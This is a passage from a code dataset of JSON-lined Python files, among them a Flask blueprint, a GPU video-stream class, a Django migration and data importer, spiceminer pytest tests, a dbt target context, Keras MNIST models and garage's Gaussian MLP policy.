is_included(self, item: Any) -> bool:\n \"\"\"\n Check if value is contained in self._items\n\n :param item: key or index of value\n \"\"\"\n return item in self._items\n\n @no_type_check\n def for_element(self, e: 'IntStr') -> Optional[Union['AbstractSetIntStr', 'MappingIntStrAny']]:\n \"\"\"\n :param e: key or index of element on value\n :return: raw values for elemet if self._items is dict and contain needed element\n \"\"\"\n\n if self._type is dict:\n item = self._items.get(e)\n return item if item is not ... else None\n return None\n\n @no_type_check\n def _normalize_indexes(\n self, items: Union['AbstractSetIntStr', 'MappingIntStrAny'], v_length: int\n ) -> Union['AbstractSetIntStr', 'DictIntStrAny']:\n \"\"\"\n :param items: dict or set of indexes which will be normalized\n :param v_length: length of sequence indexes of which will be\n\n >>> self._normalize_indexes({0, -2, -1}, 4)\n {0, 2, 3}\n >>> self._normalize_indexes({'__all__'}, 4)\n {0, 1, 2, 3}\n \"\"\"\n if self._type is set:\n if '__all__' in items:\n if items != {'__all__'}:\n raise ValueError('set with keyword \"__all__\" must not contain other elements')\n return {i for i in range(v_length)}\n return {v_length + i if i < 0 else i for i in items}\n else:\n normalized_items = {v_length + i if i < 0 else i: v for i, v in items.items() if i != '__all__'}\n all_set = items.get('__all__')\n if all_set:\n for i in range(v_length):\n normalized_items.setdefault(i, set()).update(all_set)\n\n return normalized_items\n\n def __repr_args__(self) -> 'ReprArgs':\n return [(None, self._items)]\n"} {"ext": "py", "sha": "1a3119501271b19d5d2595d31873bd7a4496c209", "content": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\nfrom flask import Blueprint, render_template\n\nabout_blueprint = Blueprint('about', __name__)\n\n\n@about_blueprint.route(\"/catalog/about\")\ndef about():\n \"\"\"Show about page.\"\"\"\n return render_template(\"about.html\")\n"} {"ext": "py", "sha": "1a311b204dd69d09d8dc8a2fc1e8e572b9ab0cf8", "content": "# _____ ______ _____ \n# / ____/ /\\ | ____ | __ \\\n# | | / \\ | |__ | |__) | Caer - Modern Computer Vision\n# | | / /\\ \\ | __| | _ / Languages: Python, C, C++, Cuda\n# | |___ / ____ \\ | |____ | | \\ \\ http://github.com/jasmcaus/caer\n# \\_____\\/_/ \\_ \\______ |_| \\_\\\n\n# Licensed under the MIT License <http://opensource.org/licenses/MIT>\n# SPDX-License-Identifier: MIT\n# Copyright (c) 2020-2021 The Caer Authors <http://github.com/jasmcaus>\n\n\nfrom threading import Thread\nimport time\nimport math\nfrom queue import Queue\nimport cv2 as cv\n\nfrom .constants import FRAME_COUNT, FPS\n\n__all__ = [\n 'GPUFileStream'\n]\n\n\nclass GPUFileStream:\n r\"\"\"\n This is an auxiliary class that enables Video Streaming using the GPU for caer with minimalistic latency, and at the expense of little to no additional computational requirements.\n \n The basic idea behind it is to tracks and save the salient feature array for the given number of frames and then uses these anchor point to cancel out all perturbations relative to it for the incoming frames in the queue. This class relies heavily on **Threaded Queue mode** for error-free & ultra-fast frame handling.\n\n Args:\n source (int, str): Source path for the video. If ``source=0``, the default camera device is used. For \n multiple external camera devices, use incremented values. For eg: ``source=1`` represents the second camera device on your system.\n qsize (int): Default queue size for handling the video streams. Default: 128.\n \"\"\"\n\n def __init__(self, source, qsize=128):\n \"\"\"\n Source must be a path to a video file\n Utilizes your system's GPU to process the stream\n \"\"\"\n\n if not isinstance(source, str):\n raise ValueError(f'Expected either a filepath. Got {type(source)}. Consider using VideoStream which supports both live video as well as pre-existing videos')\n\n # initialize the file video stream along with the boolean\n # used to indicate if the thread should be stopped or not\n self.stream = cv.VideoCapture(source)\n self.kill_stream = False\n self.count = 0\n\n # initialize the queue to store frames\n self.Q = Queue(maxsize=qsize)\n\n self.width = int(self.stream.get(cv.CAP_PROP_FRAME_WIDTH))\n self.height = int(self.stream.get(cv.CAP_PROP_FRAME_HEIGHT))\n self.res = (self.width, self.height)\n\n self.fps = math.ceil(self.stream.get(FPS))\n self.frames = int(self.stream.get(FRAME_COUNT))\n \n # since we use UMat to store the images to\n # we need to initialize them beforehand\n self.qframes = [0] * qsize\n for ii in range(qsize):\n self.qframes[ii] = cv.UMat(self.height, self.width, cv.CV_8UC3)\n\n\n def begin_stream(self):\n # start a thread to read frames from the file video stream\n t = Thread(target=self.update, args=())\n t.daemon = True\n t.start()\n return self\n\n\n def update(self):\n # keep looping infinitely\n while True:\n if self.kill_stream:\n return\n\n # otherwise, ensure the queue has room in it\n if not self.Q.full():\n self.count += 1\n target = (self.count-1) % self.Q.maxsize\n ret = self.stream.grab()\n\n if not ret:\n self.release()\n return \n\n self.stream.retrieve(self.qframes[target])\n\n # add the frame to the queue\n self.Q.put(target)\n\n\n def read(self):\n while (not self.more() and self.kill_stream):\n time.sleep(0.1)\n # return next frame in the queue\n return self.qframes[self.Q.get()]\n\n\n def more(self):\n # return True if there are still frames in the queue\n return self.Q.qsize() > 0\n\n\n def release(self):\n self.kill_stream = True\n # wait until stream resources are released\n self.thread.join()\n\n\n # Gets frame count\n def count_frames(self):\n if not self.kill_stream and not self.live_video:\n return self.frames\n # if get_opencv_version() == '2':\n # return int(self.stream.get(FRAME_COUNT_DEPR))\n # else:\n # return int(self.stream.get(FRAME_COUNT))\n \n\n if self.live_video:\n print('[WARNING] Frames cannot be computed on live streams')\n return -1\n\n\n # Gets FPS count\n def get_fps(self):\n if not self.kill_stream:\n return self.fps\n\n # Get frame dimensions\n def get_res(self):\n return self.res"} {"ext": "py", "sha": "1a311b8d1c0f185243f288a50fdddfc7fdeb848f", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0007_apirequest_extra'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='apirequest',\n name='api_client',\n field=models.CharField(null=True, editable=False, max_length=50),\n preserve_default=True,\n ),\n ]\n"} {"ext": "py", "sha": "1a311cc6d7ebf838a7a232773174002e36b9c602", "content": "#-*- coding:utf-8 -*-\n\nimport pytest\n\nimport random\nimport string\nimport itertools as itt\nimport collections\n\nimport spiceminer as sm\nimport spiceminer.kernel.lowlevel as lowlevel\n\n\n### Helpers ###\ndef rstrings(max_size):\n while True:\n yield ''.join(random.sample(string.lowercase, random.randint(1, max_size)))\n\nclass FakeKernel(object):\n def __init__(self, path):\n self.path = path\n self.loaded = True\n\n def _unload(self):\n self.loaded = False\n\n@pytest.fixture(scope='function')\ndef fake_LOADED(kernelfiles, monkeypatch):\n available = random.sample(kernelfiles, random.randint(0, len(kernelfiles)))\n substitute = {FakeKernel(path) for path in available}\n monkeypatch.setattr(lowlevel, 'LOADED_KERNELS', substitute)\n return substitute\n\n@pytest.fixture(scope='function')\ndef fake_loaders(monkeypatch):\n '''Patch lowlevel loader functions to rerturn dummy results.'''\n def fake_loader(path):\n windows = {'ABC': 'Test'}\n return windows\n for func in ('_load_sp', '_load_pc', '_load_c', '_load_f'):\n monkeypatch.setattr(lowlevel, func, fake_loader)\n\n@pytest.fixture(scope='function')\ndef fake_furnsh(monkeypatch):\n monkeypatch.setattr(lowlevel.spice, 'furnsh', lambda x: None)\n monkeypatch.setattr(lowlevel.spice, 'unload', lambda x: None)\n\n\n### Tests ###\nclass TestKernelProperties(object):\n def test_kp_good(self, kernelfile):\n kprops = lowlevel.kernel_properties(kernelfile)\n assert kprops.path == kernelfile\n assert kprops.arch in lowlevel.ARCH\n assert kprops.type in lowlevel.KTYPE\n\n def test_kp_bad(self, nonkernelfile):\n with pytest.raises((ValueError, sm.SpiceError)):\n kprops = lowlevel.kernel_properties(nonkernelfile)\n\n@pytest.mark.parametrize('ktype', list(lowlevel.KTYPE) + list(\n set(itt.islice(rstrings(10), 5)) - lowlevel.KTYPE\n))\ndef test_info_type(ktype):\n info = lowlevel._info_type(ktype)\n if ktype in lowlevel.KTYPE:\n assert info in ('pos', 'rot', 'none')\n else:\n assert info == None\n\nxValueError = pytest.mark.xfail(raises=ValueError)\n@pytest.mark.parametrize('arch', list(lowlevel.ARCH) + [xValueError('?')])\n@pytest.mark.parametrize('ktype', list(lowlevel.KTYPE) + [\n xValueError(next(rstrings(10)))\n])\ndef test_validate(arch, ktype):\n lowlevel._validate('Test', arch, ktype)\n\n@pytest.mark.parametrize('recursive', [True, False])\ndef test_icollect_kprops(datadir, kernelfiles, recursive):\n paths = set(kp.path for kp in lowlevel.icollect_kprops(datadir, recursive, False))\n if not recursive:\n assert len(paths) < len(kernelfiles)\n assert paths - set(kernelfiles) == set()\n\ndef test_ifilter_kprops(kernelfiles, fake_LOADED):\n kp = collections.namedtuple('KernelPath', 'path')\n result = lowlevel.ifilter_kprops(kp(path) for path in kernelfiles)\n result_paths = set(kprops.path for kprops in result)\n fake_paths = set(k.path for k in fake_LOADED)\n assert result_paths.symmetric_difference(fake_paths) == set(kernelfiles)\n\ndef test_iunload_kprops(kernelfiles, fake_LOADED):\n kp = collections.namedtuple('KernelPath', 'path')\n result = lowlevel.iunload_kprops(kp(path) for path in kernelfiles)\n result_paths = set(kprops.path for kprops in result)\n assert result_paths == set(kernelfiles)\n unloaded_paths = {k.path for k in fake_LOADED if not k.loaded}\n assert len(unloaded_paths) == len(fake_LOADED)\n\n@pytest.mark.parametrize('types', [\n [random.choice(list(lowlevel.KTYPE)) for i in range(10)]\n])\ndef test_split_kprops(types):\n kt = collections.namedtuple('KernelType', 'type')\n kpmisc, kpbody = lowlevel.split_kprops(kt(t) for t in types)\n body_types = {kt.type for kt in kpbody}\n misc_types = {kt.type for kt in kpmisc}\n assert body_types.union(lowlevel.KTYPE_BODY) == lowlevel.KTYPE_BODY\n assert misc_types.intersection(lowlevel.KTYPE_BODY) == set()\n assert body_types.union(misc_types) == set(types)\n\n\n\n\n@pytest.mark.usefixtures('fake_loaders', 'fake_furnsh')\ndef test_load_any(kernelfile):\n kp = collections.namedtuple('KernelProperties', ['path', 'type'])\n kprops = kp(kernelfile, random.choice(list(lowlevel.KTYPE)))\n time_window_map = lowlevel.load_any(kprops)\n if kprops.type in lowlevel.KTYPE_BODY:\n assert time_window_map == {'ABC': 'Test'}\n else:\n assert time_window_map == {}\n\ndef test_unload_any():\n pass\n\n\n@pytest.mark.parametrize('path', ['.'])\ndef test_load_dummy(path):\n assert lowlevel._load_dummy(path) == {}\n\n@pytest.mark.usefixtures('with_leapseconds')\ndef test_load_sp(spfile):\n time_window_map = lowlevel._load_sp(spfile)\n assert time_window_map != {}\n\n@pytest.mark.usefixtures('with_leapseconds', 'with_spacecraftclock')\ndef test_load_c(cfile):\n time_window_map = lowlevel._load_c(cfile)\n assert time_window_map != {}\n\n@pytest.mark.usefixtures('with_leapseconds')\ndef test_load_pc(pcfile):\n time_window_map = lowlevel._load_pc(pcfile)\n assert time_window_map != {}\n\n@pytest.mark.usefixtures('with_leapseconds')\ndef test_load_f(ffile):\n time_window_map = lowlevel._load_f(ffile)\n assert time_window_map != {}\n"} {"ext": "py", "sha": "1a311d152bedbd39e32d9587e27a033a2aa95be0", "content": "def myprint():\n \n print('myprint: ' + s)\n\ns = 'I am global variable'\nprint(s)\nmyprint()"} {"ext": "py", "sha": "1a311d7c0922e41259749d2de354c8d21f97df0b", "content": "from typing import Any, Dict\n\nfrom dbt.contracts.connection import HasCredentials\n\nfrom dbt.context.base import (\n BaseContext, contextproperty\n)\n\n\nclass TargetContext(BaseContext):\n # subclass is ConfiguredContext\n def __init__(self, config: HasCredentials, cli_vars: Dict[str, Any]):\n super().__init__(cli_vars=cli_vars)\n self.config = config\n\n @contextproperty\n def target(self) -> Dict[str, Any]:\n \"\"\"`target` contains information about your connection to the warehouse\n (specified in profiles.yml). Some configs are shared between all\n adapters, while others are adapter-specific.\n\n Common:\n\n |----------|-----------|------------------------------------------|\n | Variable | Example | Description |\n |----------|-----------|------------------------------------------|\n | name | dev | Name of the active target |\n |----------|-----------|------------------------------------------|\n | schema | dbt_alice | Name of the dbt schema (or, dataset on |\n | | | BigQuery) |\n |----------|-----------|------------------------------------------|\n | type | postgres | The active adapter being used. |\n |----------|-----------|------------------------------------------|\n | threads | 4 | The number of threads in use by dbt |\n |----------|-----------|------------------------------------------|\n\n Snowflake:\n\n |----------|-----------|------------------------------------------|\n | Variable | Example | Description |\n |----------|-----------|------------------------------------------|\n | database | RAW | The active target's database. |\n |----------|-----------|------------------------------------------|\n | warehouse| TRANSFORM | The active target's warehouse. |\n |----------|-----------|------------------------------------------|\n | user | USERNAME | The active target's user |\n |----------|-----------|------------------------------------------|\n | role | ROLENAME | The active target's role |\n |----------|-----------|------------------------------------------|\n | account | abc123 | The active target's account |\n |----------|-----------|------------------------------------------|\n\n Postgres/Redshift:\n\n |----------|-------------------|----------------------------------|\n | Variable | Example | Description |\n |----------|-------------------|----------------------------------|\n | dbname | analytics | The active target's database. |\n |----------|-------------------|----------------------------------|\n | host | abc123.us-west-2. | The active target's host. |\n | | redshift.amazonaws| |\n | | .com | |\n |----------|-------------------|----------------------------------|\n | user | dbt_user | The active target's user |\n |----------|-------------------|----------------------------------|\n | port | 5439 | The active target's port |\n |----------|-------------------|----------------------------------|\n\n BigQuery:\n\n |----------|-----------|------------------------------------------|\n | Variable | Example | Description |\n |----------|-----------|------------------------------------------|\n | project | abc-123 | The active target's project. |\n |----------|-----------|------------------------------------------|\n\n \"\"\"\n return self.config.to_target_dict()\n\n\ndef generate_target_context(\n config: HasCredentials, cli_vars: Dict[str, Any]\n) -> Dict[str, Any]:\n ctx = TargetContext(config, cli_vars)\n return ctx.to_dict()\n"} {"ext": "py", "sha": "1a311dcf3bca504bc6bedd9da792a511696e9de5", "content": "import json\nimport datetime\nfrom django.utils import timezone\nfrom django.core.exceptions import PermissionDenied\nfrom rest_framework import permissions, generics\nfrom resources.models import Unit, Reservation, Resource, ResourceType\nfrom hmlvaraus.models.hml_reservation import HMLReservation\nfrom hmlvaraus.models.berth import Berth\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\nfrom django.utils.dateparse import parse_datetime\nimport pytz\n\nclass ImporterView(generics.CreateAPIView):\n base_name = 'importer'\n permission_classes = [permissions.IsAuthenticated]\n\n def post(self, request):\n request_user = request.user\n\n if not request_user.is_staff:\n raise PermissionDenied()\n\n uploaded_file = request.data['file']\n data = uploaded_file.read().decode(\"utf-8\")\n\n data_rows = data.split('\\n')\n\n # Kohteet\n if data_rows[0][0] == '1':\n del data_rows[1]\n del data_rows[0]\n for row in data_rows:\n fields = row.split(';')\n\n try:\n print('Kohdedataa')\n a = fields[5]\n except:\n continue\n\n location = None\n if fields[5] and fields[5] != '':\n location = fields[5].split(',')\n coordinates = []\n for coord in location:\n coord = coord.strip()\n coord = float(coord)\n coordinates = [coord] + coordinates\n\n location = GEOSGeometry(json.dumps({'type': 'Point', 'coordinates': coordinates}))\n Unit.objects.get_or_create(name=fields[0], street_address=fields[1], address_zip=fields[2], email=fields[3], phone=fields[4], location=location, description=fields[6])\n\n\n # Venepaikat\n if data_rows[0][0] == '2':\n del data_rows[1]\n del data_rows[0]\n for row in data_rows:\n fields = row.split(';')\n\n try:\n print('Venepaikkadataa, Kohde:', fields[0])\n unit = Unit.objects.get(name=fields[0]);\n except:\n continue\n\n resource_types = ResourceType.objects.all();\n for resource_type in resource_types:\n if 'vene' in resource_type.name.lower() or 'boat' in resource_type.name.lower():\n type_instance = resource_type\n\n resource = Resource.objects.get_or_create(unit=unit, name=fields[1], description=fields[2], type=type_instance, reservable=True)[0]\n is_disabled = False\n if fields[3] == 'kyllä':\n is_disabled = True\n price = 0\n if fields[4]:\n price = fields[4].replace(',', '.')\n price = float(price)\n\n type_mapping = {\n 'numero': 'number',\n 'laituri': 'dock',\n 'poletti': 'ground'\n }\n length = 0\n width = 0\n depth = 0\n if fields[5] and fields[5] != '':\n length = int(fields[5])\n if fields[6] and fields[6] != '':\n width = int(fields[6])\n if fields[7] and fields[7] != '':\n depth = int(fields[7])\n\n berth_type = type_mapping.get(fields[8].lower(), None)\n Berth.objects.get_or_create(resource=resource, is_disabled=is_disabled, price=price, length_cm=length, width_cm=width, depth_cm=depth, type=berth_type)\n\n\n # Varaukset\n if data_rows[0][0] == '3':\n del data_rows[1]\n del data_rows[0]\n for i, row in enumerate(data_rows):\n fields = row.split(';')\n try:\n print(i, 'Varausdataa, Kohde:', fields[1])\n unit = Unit.objects.get(name=fields[1])\n resource = Resource.objects.get(unit=unit, name=str(fields[0]), description=str(fields[4]))\n except:\n continue\n\n resource.reservable = False\n\n berth = Berth.objects.get(resource=resource)\n begin = parse_datetime(str(fields[2]) + ' 00:00:00')\n begin = pytz.timezone(\"Europe/Helsinki\").localize(begin, is_dst=None)\n end = parse_datetime(str(fields[3]) + ' 00:00:00')\n end = pytz.timezone(\"Europe/Helsinki\").localize(end, is_dst=None)\n\n state = 'confirmed'\n state_updated_at = timezone.now()\n is_paid = False\n is_paid_at = None\n if fields[5] and fields[5].strip() != '':\n state_updated_at = datetime.datetime.strptime(fields[5], \"%d.%m.%Y %H:%M\")\n state = 'cancelled'\n\n if fields[6] and fields[6].strip() != '':\n is_paid_at = datetime.datetime.strptime(fields[6], \"%d.%m.%Y %H:%M\")\n is_paid = True\n\n\n reservation = Reservation.objects.create(\n resource=resource,\n begin=begin,\n end=end,\n event_description=fields[4] or '',\n state=state,\n reserver_name=fields[7] or '',\n reserver_email_address=fields[8] or '',\n reserver_phone_number=fields[9] or '',\n reserver_address_street=fields[10] or '',\n reserver_address_city=fields[11] or '',\n reserver_address_zip=fields[12] or '',\n )\n\n HMLReservation.objects.get_or_create(reservation=reservation, berth=berth, state_updated_at=state_updated_at, is_paid_at=is_paid_at, is_paid=is_paid)\n resource.save()\n\n return Response(\n status=status.HTTP_201_CREATED\n )\n"} {"ext": "py", "sha": "1a311def484d912295ffd2dc48724e092b31100f", "content": "#!/usr/bin/env python3\nfrom training import *\nfrom datasets import load_mnist_data as load_data\n\ndef make_tiny_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(6, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(32),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_small_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(42),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_small_maxp_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(8, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(42),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_medium_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(5, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(5, (5, 5)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(3, (7, 7)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(64),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\ndef make_large_model (input_shape, **kwds):\n return tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(32, (3, 3), input_shape = input_shape),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(16, (5, 5)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Conv2D(8, (7, 7)),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(256),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(64),\n tf.keras.layers.Activation('relu'),\n tf.keras.layers.Dense(10),\n tf.keras.layers.Activation('softmax'),\n ], **kwds)\n\n# classifier (load_data, make_tiny_model,\n# model_name = 'mnist_tiny',\n# epochs = 20)\n\n# classifier (load_data, make_small_model,\n# model_name = 'mnist_small',\n# epochs = 20)\n\n# classifier (load_data, make_small_model,\n# model_name = 'mnist_small_overfitting',\n# early_stopping = False,\n# epochs = 50)\n\nclassifier (load_data, make_small_maxp_model,\n model_name = 'mnist_small_maxp',\n epochs = 20)\n\n# classifier (load_data, make_medium_model,\n# model_name = 'mnist_medium',\n# epochs = 20)\n\n# classifier (load_data, make_large_model,\n# model_name = 'mnist_overfitting',\n# early_stopping = False,\n# epochs = 20)\n"} {"ext": "py", "sha": "1a311f8c96d103e999b09e38d691bbd0be6cbbb1", "content": "\"\"\"Gaussian MLP Policy.\n\nA policy represented by a Gaussian distribution\nwhich is parameterized by a multilayer perceptron (MLP).\n\"\"\"\n# pylint: disable=wrong-import-order\nimport akro\nimport numpy as np\nimport tensorflow as tf\n\nfrom garage.tf.models import GaussianMLPModel\nfrom garage.tf.policies.policy import StochasticPolicy\n\n\nclass GaussianMLPPolicy(StochasticPolicy):\n \"\"\"Gaussian MLP Policy.\n\n A policy represented by a Gaussian distribution\n which is parameterized by a multilayer perceptron (MLP).\n\n Args:\n env_spec (garage.envs.env_spec.EnvSpec): Environment specification.\n name (str): Model name, also the variable scope.\n hidden_sizes (list[int]): Output dimension of dense layer(s) for\n the MLP for mean. For example, (32, 32) means the MLP consists\n of two hidden layers, each with 32 hidden units.\n hidden_nonlinearity (callable): Activation function for intermediate\n dense layer(s). It should return a tf.Tensor. Set it to\n None to maintain a linear activation.\n hidden_w_init (callable): Initializer function for the weight\n of intermediate dense layer(s). The function should return a\n tf.Tensor.\n hidden_b_init (callable): Initializer function for the bias\n of intermediate dense layer(s). The function should return a\n tf.Tensor.\n output_nonlinearity (callable): Activation function for output dense\n layer. It should return a tf.Tensor. Set it to None to\n maintain a linear activation.\n output_w_init (callable): Initializer function for the weight\n of output dense layer(s). The function should return a\n tf.Tensor.\n output_b_init (callable): Initializer function for the bias\n of output dense layer(s). The function should return a\n tf.Tensor.\n learn_std (bool): Is std trainable.\n adaptive_std (bool): Is std a neural network. If False, it will be a\n parameter.\n std_share_network (bool): Boolean for whether mean and std share\n the same network.\n init_std (float): Initial value for std.\n std_hidden_sizes (list[int]): Output dimension of dense layer(s) for\n the MLP for std. For example, (32, 32) means the MLP consists\n of two hidden layers, each with 32 hidden units.\n min_std (float): If not None, the std is at least the value of min_std,\n to avoid numerical issues.\n max_std (float): If not None, the std is at most the value of max_std,\n to avoid numerical issues.\n std_hidden_nonlinearity (callable): Nonlinearity for each hidden layer\n in the std network. The function should return a tf.Tensor.\n std_output_nonlinearity (callable): Nonlinearity for output layer in\n the std network. The function should return a\n tf.Tensor.\n std_parameterization (str): How the std should be parametrized. There\n are a few options:\n - exp: the logarithm of the std will be stored, and applied a\n exponential transformation\n - softplus: the std will be computed as log(1+exp(x))\n layer_normalization (bool): Bool for using layer normalization or not.\n\n \"\"\"\n\n def __init__(self,\n env_spec,\n name='GaussianMLPPolicy',\n hidden_sizes=(32, 32),\n hidden_nonlinearity=tf.nn.tanh,\n hidden_w_init=tf.initializers.glorot_uniform(),\n hidden_b_init=tf.zeros_initializer(),\n output_nonlinearity=None,\n output_w_init=tf.initializers.glorot_uniform(),\n output_b_init=tf.zeros_initializer(),\n learn_std=True,\n adaptive_std=False,\n std_share_network=False,\n init_std=1.0,\n min_std=1e-6,\n max_std=None,\n std_hidden_sizes=(32, 32),\n std_hidden_nonlinearity=tf.nn.tanh,\n std_output_nonlinearity=None,\n std_parameterization='exp',\n layer_normalization=False):\n if not isinstance(env_spec.action_space, akro.Box):\n raise ValueError('GaussianMLPPolicy only works with '\n 'akro.Box action space, but not {}'.format(\n env_spec.action_space))\n super().__init__(name, env_spec)\n self._obs_dim = env_spec.observation_space.flat_dim\n self._action_dim = env_spec.action_space.flat_dim\n\n self._hidden_sizes = hidden_sizes\n self._hidden_nonlinearity = hidden_nonlinearity\n self._hidden_w_init = hidden_w_init\n self._hidden_b_init = hidden_b_init\n self._output_nonlinearity = output_nonlinearity\n self._output_w_init = output_w_init\n self._output_b_init = output_b_init\n self._learn_std = learn_std\n self._adaptive_std = adaptive_std\n self._std_share_network = std_share_network\n self._init_std = init_std\n self._min_std = min_std\n self._max_std = max_std\n self._std_hidden_sizes = std_hidden_sizes\n self._std_hidden_nonlinearity = std_hidden_nonlinearity\n self._std_output_nonlinearity = std_output_nonlinearity\n self._std_parameterization = std_parameterization\n self._layer_normalization = layer_normalization\n\n self._f_dist = None\n self._dist = None\n\n self.model = GaussianMLPModel(\n output_dim=self._action_dim,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n hidden_w_init=hidden_w_init,\n hidden_b_init=hidden_b_init,\n output_nonlinearity=output_nonlinearity,\n output_w_init=output_w_init,\n output_b_init=output_b_init,\n learn_std=learn_std,\n adaptive_std=adaptive_std,\n std_share_network=std_share_network,\n init_std=init_std,\n min_std=min_std,\n max_std=max_std,\n std_hidden_sizes=std_hidden_sizes,\n std_hidden_nonlinearity=std_hidden_nonlinearity,\n std_output_nonlinearity=std_output_nonlinearity,\n std_parameterization=std_parameterization,\n layer_normalization=layer_normalization,\n name='GaussianMLPModel')\n\n self._initialize()\n\n def _initialize(self):\n \"\"\"Initialize policy.\"\"\"\n with tf.compat.v1.variable_scope(self.name) as vs:\n self._variable_scope = vs\n state_input = tf.compat.v1.placeholder(tf.float32,\n shape=(None, None,\n self._obs_dim))\n self._dist, mean, log_std = self.model.build(state_input).outputs\n self._f_dist = tf.compat.v1.get_default_session().make_callable(\n [self._dist.sample(), mean, log_std], feed_list=[state_input])\n\n @property\n def input_dim(self):\n \"\"\"int: Dimension of the policy input.\"\"\"\n return self._obs_dim\n\n def build(self, state_input, name=None):\n \"\"\"Build policy.\n\n Args:\n state_input (tf.Tensor) : State input.\n name (str): Name of the policy, which is also the name scope.\n\n Returns:\n tfp.distributions.MultivariateNormalDiag: Distribution.\n tf.tensor: Mean.\n tf.Tensor: Log of standard deviation.\n\n \"\"\"\n with tf.compat.v1.variable_scope(self._variable_scope):\n return self.model.build(state_input, name=name)\n\n @property\n def vectorized(self):\n \"\"\"Vectorized or not.\n\n Returns:\n Bool: True if primitive supports vectorized operations.\n\n \"\"\"\n return True\n\n def get_action(self, observation):\n \"\"\"Get single action from this policy for the input observation.\n\n Args:\n observation (numpy.ndarray): Observation from environment.\n\n Returns:\n numpy.ndarray: Actions\n dict: Predicted action and agent information.\n\n Note:\n It returns an action and a dict, with keys\n - mean (numpy.ndarray): Mean of the distribution.\n - log_std (numpy.ndarray): Log standard deviation of the\n distribution.\n\n \"\"\"\n sample, mean, log_std = self._f_dist(np.expand_dims([observation], 1))\n sample = self.action_space.unflatten(np.squeeze(sample, 1)[0])\n mean = self.action_space.unflatten(np.squeeze(mean, 1)[0])\n log_std = self.action_space.unflatten(np.squeeze(log_std, 1)[0])\n return sample, dict(mean=mean, log_std=log_std)\n\n def get_actions(self, observations):\n \"\"\"Get multiple actions from this policy for the input observations.\n\n Args:\n observations (numpy.ndarray): Observations from environment.\n\n Returns:\n numpy.ndarray: Actions\n dict: Predicted action and agent information.\n\n Note:\n It returns actions and a dict, with keys\n - mean (numpy.ndarray): Means of the distribution.\n - log_std (numpy.ndarray): Log standard deviations of the\n distribution.\n\n \"\"\"\n samples, means, log_stds = self._f_dist(np.expand_dims(\n observations, 1))\n samples = self.action_space.unflatten_n(np.squeeze(samples, 1))\n means = self.action_space.unflatten_n(np.squeeze(means, 1))\n log_stds = self.action_space.unflatten_n(np.squeeze(log_stds, 1))\n return samples, dict(mean=means, log_std=log_stds)\n\n @property\n def distribution(self):\n \"\"\"Policy distribution.\n\n Returns:\n tfp.Distribution.MultivariateNormalDiag: Policy distribution.\n\n \"\"\"\n return self._dist\n\n def clone(self, name):\n \"\"\"Return a clone of the policy.\n\n It only copies the configuration of the primitive,\n not the parameters.\n\n Args:\n name (str): Name of the newly created policy. It has to be\n different from source policy if cloned under the same\n computational graph.\n\n Returns:\n garage.tf.policies.GaussianMLPPolicy: Newly cloned policy.\n\n \"\"\"\n return self.__class__(\n name=name,\n env_spec=self._env_spec,\n hidden_sizes=self._hidden_sizes,\n hidden_nonlinearity=self._hidden_nonlinearity,\n hidden_w_init=self._hidden_w_init,\n hidden_b_init=self._hidden_b_init,\n output_nonlinearity=self._output_nonlinearity,\n output_w_init=self._output_w_init,\n output_b_init=self._output_b_init,\n learn_std=self._learn_std,\n adaptive_std=self._adaptive_std,\n std_share_network=self._std_share_network,\n init_std=self._init_std,\n min_std=self._min_std,\n max_std=self._max_std,\n std_hidden_sizes=self._std_hidden_sizes,\n std_hidden_nonlinearity=self._std_hidden_nonlinearity,\n std_output_nonlinearity=self._std_output_nonlinearity,\n std_parameterization=self._std_parameterization,\n layer_normalization=self._layer_normalization)\n\n def __getstate__(self):\n \"\"\"Object.__getstate__.\n\n Returns:\n dict: the state to be pickled for the instance.\n\n \"\"\"\n new_dict = super().__getstate__()\n del new_dict['_f_dist']\n del new_dict['_dist']\n return new_dict\n\n def __setstate__(self, state):\n \"\"\"Object.__setstate__.\n\n Args:\n state (dict): Unpickled state.\n\n \"\"\"\n super().__setstate__(state)\n self._initialize()\n"} {"ext": "py", "sha": "1a3120b9c15a59170503cbe409ce3994c30fddc4", "content": "# never name this package \"types\", or mypy will crash in ugly ways\nfrom 